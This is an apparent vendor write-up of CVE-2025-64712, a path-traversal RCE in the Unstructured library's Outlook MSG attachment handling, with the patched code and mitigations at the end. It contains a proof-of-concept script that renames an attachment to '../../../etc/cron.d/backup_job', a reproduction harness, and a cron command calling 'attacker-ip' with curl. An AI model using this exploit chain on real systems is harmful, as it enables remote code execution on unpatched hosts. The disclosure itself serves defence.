我们的 AI 引擎 Neutron 在加州大学伯克利分校的 CyberGym 基准测试中取得了 96.75% 的成绩。 了解更多

安全

安全

CVE-2025-64712:Unstructured 库 MSG 处理中的路径遍历 RCE

对 CVE-2025-64712 的技术拆解。这是 Unstructured Python 库(< 0.18.18)中一个 CVSS 9.8 严重级别的路径遍历远程代码执行漏洞。在 Outlook MSG 处理过程中,未经净化的附件文件名允许路径遍历,使攻击者能够通过构造的 MSG 文件覆盖任意文件并实现代码执行。

CVE-2025-64712

Unstructured 库 MSG 处理中的严重路径遍历 RCE

2026 年 2 月 18 日 · CVSS 9.8 严重 · Unstructured < 0.18.18

CVE 编号 CVSS 受影响版本 修复版本
CVE-2025-64712 9.8 严重 < 0.18.18 0.18.18+

CVE-2025-64712 概述:Unstructured 库中的路径遍历

Unstructured Python 库是一个用于预处理复杂文档类型的开源工具包。在一年多一点的时间里,Unstructured 库的下载量就超过了 4,000,000 次,被用于近 10,000 个公开 GitHub 仓库、100 个 Python 包,并在数十款由 LLM 驱动的产品背后默默运行。然而,研究人员在其处理 Microsoft Outlook .msg 文件的 partition_msg 函数中发现了一个严重的路径遍历(CWE-22)漏洞。当启用 process_attachments 设置时(它默认是启用的),该库可被操纵,从而写入文件到其预期的临时目录之外。

def partition_msg(
filename: Optional[str] = None,
*,
file: Optional[IO[bytes]] = None,
metadata_filename: Optional[str] = None,
metadata_last_modified: Optional[str] = None, 
process_attachments: bool = True, # the vulnerability trigger 
**kwargs: Any,
) -> list[Element]:

<SNIP>

Unstructured 库中的路径遍历:不安全的文件名处理

问题的核心是一个路径遍历(CWE-22)漏洞。该库的 _attachment_file_name() 函数直接从 .msg 文件中提取附件的名称,未经任何净化。

@lazyproperty
def  _attachment_file_name(self) -> str:
      """The original name of the attached file, no path.
      This value is 'unknown' if it is not present in the MSG file (not
expected).
      """
      return self._attachment.file_name or "unknown" 

CVE-2025-64712 概念验证:通过路径遍历实现远程代码执行

利用 CVE-2025-64712 需要经过一个精心设计的三阶段过程,将一个普通的电子邮件附件转化为系统级命令。以下步骤概述了攻击者如何从一个简单的 .msg 文件一步步发展到完整的远程代码执行(RCE)。

第 1 步:构造初始 .msg 文件

攻击始于生成一个合法的 Microsoft Outlook 邮件(.msg)文件,作为投递载体。

  • 初始化草稿:打开 Outlook 并创建一封新邮件。

  • 嵌入载荷:填写邮件字段,并附上包含目标内容的文件(例如一个用于目标配置目录的 cron 作业脚本)。

  • 导出文件:依次选择 File > Save As(或在 Web 客户端中选择 Download > Download as MSG)来导出该邮件。

攻击者会在该邮件中附上一个包含恶意载荷的文件,例如一个 cron 作业脚本。在此阶段,由于附件名称是常规的(例如 backup_job),该文件是无害的。

在 .msg 文件中查看附件

第 2 步:注入遍历路径

攻击者使用一个专门的 Python 脚本来修改 .msg 文件的二进制结构。通过针对文件内部的 OLE 结构,攻击者将附件从一个简单的文件名重命名为一个包含遍历序列的相对路径。

  • 转换:backup_job 变为 ../../../etc/cron.d/backup_job。

  • 结果:生成一个构造好的 payload.msg,其中文件名本身就包含了逃逸临时目录的指令。

#!/usr/bin/env python3
"""
rename_msg_attachment.py
------------------------
Rename an attachment's filename inside a .msg (OLE2/Compound Document) file.
Supports new filenames of ANY length — reallocates mini-sectors as needed.

Edit the three variables below and run:
    python rename_msg_attachment.py
"""

import sys
import struct
import shutil
import os
import math



INPUT_FILE  = "backup.msg"        # Path to the source .msg file
OLD_NAME    = "backup_job"        # Current attachment filename 
NEW_NAME    = "../../../etc/cron.d/backup_job"       # New attachment filename 
OUTPUT_FILE = "payload.msg"                # Output path — leave empty "" to overwrite INPUT_FILE

<SNIP>


# Core rename logic

def rename_attachment(input_path, old_name, new_name, output_path):
    print(f"[*] Opening: {input_path}")
    ole = OleFile(input_path)

    attach_storages = find_attach_storages(ole)
    if not attach_storages:
        err("No attachment storages found in this .msg file.")

    print(f"[*] Found {len(attach_storages)} attachment(s).")

    renamed = 0
    for att in attach_storages:
        children = get_children(ole, att['idx'])
        by_name  = {c['name'].upper(): c for c in children}

        long_e  = by_name.get(prop_stream_name(PR_ATTACH_LONG_FILENAME).upper())
        short_e = by_name.get(prop_stream_name(PR_ATTACH_FILENAME).upper())
        disp_e  = by_name.get(prop_stream_name(PR_DISPLAY_NAME).upper())
        ext_e   = by_name.get(prop_stream_name(PR_ATTACH_EXTENSION).upper())

        current = None
        if long_e:
            current = read_unicode(ole, long_e['idx'])
        elif short_e:
            current = read_unicode(ole, short_e['idx'])

        print(f"    [{att['name']}]  current filename: {current!r}")

        if current is None or current.lower() != old_name.lower():
            continue

        # Encode new values
        new_encoded   = encode_unicode(new_name)
        short_encoded = encode_unicode(short_name(new_name))
        parts         = new_name.rsplit('.', 1)
        new_ext       = ('.' + parts[1]) if len(parts) == 2 else ''
        ext_encoded   = encode_unicode(new_ext)

        print(f"    [+] Match! Renaming '{current}' -> '{new_name}'")
        print(f"        old size: {len(encode_unicode(current))} bytes  "
              f"new size: {len(new_encoded)} bytes")

        if long_e:
            ole.write_stream(long_e['idx'], new_encoded)
            print(f"        ✓ Long filename patched.")

        if short_e:
            ole.write_stream(short_e['idx'], short_encoded)
            print(f"        ✓ Short filename patched -> '{short_name(new_name)}'")

        if disp_e:
            ole.write_stream(disp_e['idx'], new_encoded)
            print(f"        ✓ Display name patched.")

        if ext_e:
            ole.write_stream(ext_e['idx'], ext_encoded)
            print(f"        ✓ Extension patched -> '{new_ext}'")

        renamed += 1

    if renamed == 0:
        print(f"\n[!] No attachment named '{old_name}' was found.")
        all_names = []
        for att in attach_storages:
            children = get_children(ole, att['idx'])
            by_name  = {c['name'].upper(): c for c in children}
            long_e   = by_name.get(prop_stream_name(PR_ATTACH_LONG_FILENAME).upper())
            short_e  = by_name.get(prop_stream_name(PR_ATTACH_FILENAME).upper())
            name = None
            if long_e:
                name = read_unicode(ole, long_e['idx'])
            elif short_e:
                name = read_unicode(ole, short_e['idx'])
            if name:
                all_names.append(name)
        if all_names:
            print(f"    Available attachment(s): {', '.join(repr(n) for n in all_names)}")
            def similarity(a, b):
                a, b = a.lower(), b.lower()
                return sum(c in b for c in a) / max(len(a), 1)
            best = max(all_names, key=lambda n: similarity(old_name, n))
            if similarity(old_name, best) > 0.5:
                print(f"    Did you mean: '{best}' ?")
        sys.exit(1)

    ole.save(output_path)
    print(f"\n[✓] Saved to: {output_path}  ({renamed} attachment(s) renamed)")

<SNIP>

成功重命名附件文件名

第 3 步:搭建测试环境

为了复现该缺陷,我们使用一个受控环境(通常是一个 Docker 容器)来运行存在漏洞的 unstructured 库版本(v0.18.15)。编写一个简单的 Python 包装脚本来调用 partition_msg 函数,并启用关键的 process_attachments=True 标志。

import os
import sys
from unstructured.partition.msg import partition_msg

# Disable the digit limit that causes parser crashes
if hasattr(sys, 'set_int_max_str_digits'):
    sys.set_int_max_str_digits(0)
def process_msg():
    print("[*] Handing exploit.msg to partition_msg()...")


    try:
        # This triggers the vulnerable function:
        partition_msg(
            filename="payload.msg",
            process_attachments=True
        )
    except Exception as e:
        # We catch the exception because the parser often crashes 
        # AFTER the file is written due to OLE sector math errors.
        print(f"[!] Parser finished with: {e}")

    # THE FINAL VERDICT
    if os.path.exists("/etc/cron.d/backup_job"):
        print("\n" + "="*45)
        print("!!! VULNERABILITY REPRODUCED !!!")
        print("The library  wrote successfuly to '/etc/cron.d/backup_job'")
        with open("/etc/cron.d/backup_job", "r") as f:
            print(f"File content: {f.read()}")
        print("="*45)
    else:
        print("\n[-] Exploit failed: /etc/cron.d/backup_job not found.")

if __name__ == "__main__":
    process_msg()

第 4 步:漏洞利用与 RCE

当复现脚本处理恶意的 payload.msg 时,该库会提取附件。由于缺乏净化,它会将遍历字符串拼接到其内部路径上,从而将文件直接写入主机的系统目录。

  • 文件写入:该库将攻击者的脚本写入 /etc/cron.d/backup_job。
  • 命令执行:系统的 cron 守护进程拾取这个新作业,其中可能包含类似 curl http://attacker-ip:port/rce_test. 这样的命令。
  • 结论:攻击者在其服务器上观察到一个传入的请求,证实他们现在可以在目标系统上执行任意代码。

通过 cron 作业实现远程代码执行

如何在 Unstructured 库中修复 CVE-2025-64712

保护您的环境最有效的方法是将 Unstructured 更新到 0.18.18 或更高版本。该修复引入了一套稳健的净化流程,用于剥离危险的路径组件。

修复后代码分析

修补后的版本现在包含了针对 Unix 和 Windows 路径分隔符来清理文件名的逻辑:

# The updated, safe logic in v0.18.18+
raw_filename = self.attachment.file_name or "unknown" 

# Remove path components and handle cross-platform attacks
safe_filename = os.path.basename(raw_filename.replace("\\", "/")) 

# Strip null bytes and control characters
safe_filename = safe_filename.replace("\0", "") 

# Ensure the filename isn't empty or just dots
if not safe_filename or safe_filename in (".", ".."): 
    safe_filename = "unknown" 

CVE-2025-64712 缓解措施与最佳实践

  • 立即更新:如果您使用 unstructured 进行电子邮件处理,请确保使用 0.18.18 或更高版本。
  • 净化输入:在处理由外部文件提供的文件名时,始终使用 os.path.basename()。
  • 权限检查:以所需的最小权限运行您的处理脚本,以限制潜在文件写入漏洞的影响。
资源 链接
Unstructured CVE-2025-64712 https://github.com/Unstructured-IO/unstructured/security/advisories/GHSA-gm8q-m8mv-jj5m
Unstructured 修复 https://github.com/Unstructured-IO/unstructured/compare/0.18.15...0.18.18
NVD https://nvd.nist.gov/vuln/detail/CVE-2025-64712
CWE-22 https://cwe.mitre.org/data/definitions/22.html